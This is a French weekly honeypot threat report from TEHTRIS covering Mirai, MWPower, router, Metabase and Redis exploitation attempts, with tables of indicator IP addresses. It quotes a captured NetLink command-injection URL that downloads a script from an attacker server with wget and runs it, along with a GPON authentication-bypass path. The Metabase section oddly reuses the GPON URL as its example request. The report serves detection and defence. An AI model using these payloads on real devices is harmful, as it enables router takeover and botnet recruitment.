L’analyse des activités observées sur le réseau de honeypots de TEHTRIS en semaine 39 a permis de mettre en avant de nouveaux indices de compromissions et de détecter les types d’attaques populaires chez les acteurs malveillants.
Sommaire
Activité malveillante du botnet Mirai
Des traces du malware Mirai (dont l’activité est associée au User Agent « Hello, world ») ont à nouveau été observées émanant de 346 adresses IP différentes.
Serveurs C2 visant à exploiter MWPower
94% des requêtes enregistrées cette semaine sur les honeypots TEHTRIS visaient à exploiter la vulnérabilité d’exécution de commande Shell à distance sur les enregistreurs de vidéo-surveillance MWPower, déjà étudiée la semaine dernière. 19 serveurs malveillants sont appelés par les commandes wget, dont 9 sont les mêmes qu’observés en semaine 38. Les 10 nouveaux IoC sont :
IP / Domain Name | Country | AS |
chdestruction.cf | Extension de la république Centrafricaine | Ce nom de domaine est associé à l’adresse IP croate 45.95.169[.]145 (AS 211619 MAXKO j.d.o.o). |
85.31.46[.]179 | US | AS 211252 Delis LLC |
80.11.88[.]106 | FR | AS 3215 Orange |
78.172.126[.]236 | TR | AS 9121 Turk Telekom |
46.19.141[.]122 | CN | AS 51852 Private Layer INC |
27.41.9[.]81 | CN | AS 17816 China Unicom IP network China169 Guangdong province |
175.42.40[.]49 | CN | AS 4837 CHINA UNICOM China169 Backbone |
118.199.171[.]77 | CN | AS 4808 China Unicom Beijing Province Network |
110.89.10[.]163 | CN | AS 4134 Chinanet |
103.83.110[.]85 | IN | AS 134045 Ishan Netsol Pvt Ltd |
101.0.55[.]159 | IN | AS 133661 Netplus Broadband Services Private Limited |
Tentative d’exploitation de routeurs
Hormis les requêtes visant les appareils MWPower, des tentatives d’exploitation de routeurs vulnérables ont été observées, se basant sur des vulnérabilités connues. Ainsi, les URL suivantes tentent d’exploiter :
– La CVE-2020-8958 (CVSS3 : 7.2) qui permet d’exécuter du code à distance sur les routeurs NetLink vulnérables :
/boaform/admin/formPing?target_addr=; wget http[:]//46.19.141[.]122/netlink -O -> /tmp/jno;chmod 777 /tmp/jno;sh /tmp/jno'/& waninf=1_INTERNET_R_VID_154$
– Une vulnérabilité dans certains routeurs ZyXEL et Billion (répandus en Thaïlande) dévoilée en 2016 et qui permet à l’attaquant d’obtenir une élévation de privilège :
/cgi-bin/ViewLog.asp
– La CVE-2018-10561 (CVSS3 : 9.8), qui exploite une vulnérabilité sur les routeurs Dasan GPON et permet à un attaquant de contourner l’authentification en ajoutant /images à une URL et d’en prendre le contrôle.
/GponForm/diag_Form?images/
Il est à souligner que ces tentatives d’attaques sont également menées par d’autres acteurs malveillants que le malware Mirai. TEHTRIS recommande fortement de toujours mettre à jour vos appareils afin de vous prémunir de ce genre de vulnérabilités connues et corrigées.
Tentative d’exploitation du gestionnaire de base de données Metabase
Observées cette semaine, 3 adresses IP de l’opérateur DigitalOcean-ASN (AS14061) tentant d’exploiter des versions de Metabase (une plateforme open-source de gestion de données) vulnérables à la CVE-2021–41277 (CVSS3 : 7.5), qui permet à un attaquant d’accéder à des fichiers sensibles du serveur visé.
Requête :
URL: /GponForm/diag_Form?images/
User Agent: l9explore/1.3.0
IoC:
IP | Country | AS |
161.35.86[. ]181 | NL | AS 14061 DIGITALOCEAN-ASN |
134.122.112[. ]12 | US | |
161.35.188[. ]242 | US |
Activité réseau malveillante
Sur le total des activités malveillantes menées sur le réseau de honeypots de TEHTRIS cette semaine, 18% provenaient d’adresses IP enregistrées aux Etats-Unis, 17,21% d’adresses IP enregistrées aux Pays-Bas (principalement de l’AS AS 202425 IP Volume inc mentionné en semaine 37) et 15,6% d’adresses IP enregistrées en Chine. Par ailleurs, 9,1% provenaient d’adresses IP bulgares, principalement enregistrées chez l’AS 207812 Dm Auto Eood localisé à Sofia, qui existe depuis le 20/11/2019. Très peu d’informations sont disponibles à son sujet si ce n’est que ses adresses IP sont défavorablement connues des bases de données publiques à cause de leurs activités suspectes. Selon DNSlytics, cet AS bulgare héberge 9 domaines tels que vip-support[.]org et freedom4ua[.]net. 4 serveurs sont également enregistrés dont ns1.cloud[.]mobi et ns2.vip-support[.]org.
Ci-dessous les 10 adresses IP les plus actives dans les tentatives d’attaque sur les honeypots TEHTRIS :
IP address | Percentage count | AS | Country |
89.248.165.68 | 5.174% | AS 202425 IP Volume inc | NL |
89.248.165.97 | 4.276% | AS 202425 IP Volume inc | NL |
89.248.165.166 | 3.981% | AS 202425 IP Volume inc | NL |
79.124.62.82 | 3.754% | AS 207812 Dm Auto Eood | BG |
79.124.62.130 | 3.585% | AS 207812 Dm Auto Eood | BG |
79.124.62.78 | 3.573% | AS 207812 Dm Auto Eood | BG |
79.124.62.86 | 3.465% | AS 207812 Dm Auto Eood | BG |
87.246.7.198 | 3.368% | AS 204428 SS-Net | BG |
5.8.18.18 | 3.251% | AS 202425 IP Volume inc | MD |
89.248.165.17 | 2.949% | AS 202425 IP Volume inc | NL |
Par ailleurs, TEHTRIS a prêté attention à l’utilisation de ports non-standards. Sur ces derniers, 13% des événements sont des requêtes TCP sur le port 6379. Le port 6379 est utilisé dans le cadre de l’exploitation d’une vulnérabilité sur les instances Redis (système de gestion de base de données), et permet à un attaquant non authentifié d’y accéder à distance et d’exécuter du code. Il s’agit de la CVE-2022-20821(CVSS3 : 6.5). 70% de l’activité observée sur le port 6379 provenait d’adresses IP chinoises.
TEHTRIS recommande de limiter l’exposition des serveurs utilisant Redis en n’autorisant que les flux provenant d’utilisateurs légitimes.